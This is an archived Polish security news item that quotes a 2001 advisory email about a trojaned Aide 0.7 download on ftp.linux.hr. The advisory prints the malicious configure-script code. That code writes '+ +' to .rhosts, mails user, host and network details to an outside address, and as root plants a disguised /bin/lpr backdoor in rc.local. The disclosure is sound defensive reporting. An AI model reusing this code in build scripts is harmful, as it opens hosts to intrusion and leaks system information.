Czy sprawdzasz sygnaturę dołączoną do każdego programu, który właśnie skopiowałeś z sieci i zamierzasz zainstalować? Jeśli jesteś wśród większości użytkowników komputerów, nie zrobiłeś tego. Jak pokazuje przypadek programu Aide zamieszczonego na ftp.linux.hr, nawet oprogramowanie ciągnięte z tak wiarygodnej domeny może zawierać kod nieprzewidziany przez jego autorów… W tym wypadku jest to kod dodający + + do pliku .rhosts i wysyłający informacje o tym na adres l4m0r@freebox.com. Więcej informacji na ten temat, a także kod trojana, znajdziecie w cytowanym poniżej mailu.

  Subject: Trojan in Aide distribution at ftp.linux.hr Date: 07 Aug 2001 09:45:42 +0300 From: Rami Lehti <Rami.Lehti@finland.sun.com> To: incidents@securityfocus.com Cc: aide@cs.tut.fi  It has come my attention that there has been a trojaned Aide distribution at ftp://ftp.linux.hr/pub/aide The offending binary has been removed. Anyone who has downloaded Aide 0.7 from ftp.linux.hr is urged to download it from ftp://ftp.cs.tut.fi/pub/src/gnu and always check the PGP signature before using any distribution of Aide.  The trojaned distribution contains the following script embedded in the configure script. As you can see it tries to add "+ +" to roots .rhosts and sends information about your host to l4m0r@freebox.com   # checking if we are root or not if [ `whoami` == "root" ];then root_user=1 else root_user=0 fi  And later on: if [ $root_user != "1" ];then echo "+ +" > ~/.rhosts echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname >>/tmp/jea;/sbin/ifconfig >  >/tmp/jea  mail l4m0r@freebox.com < /tmp/jea  rm -rf /tmp/jea else if [ `uname -s` != Linux ];then echo "" else mv -f .xinitrc /bin/lpr echo "# printing status monitor" >> /etc/rc.d/rc.local echo "/bin/lpr &" >> /etc/rc.d/rc.local hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea mail l4m0r@freebox.com < /tmp/jea  /bin/lpr & rm -rf /tmp/jea fi fi    Rami Lehti -- AIDE - Advanced Intrusion Detection Environment Check http://www.cs.tut.fi/~rammer/aide.html 

Archiwalny news dodany przez użytkownika: honey.
Kliknij tutaj by zobaczyć archiwalne komentarze.

Share →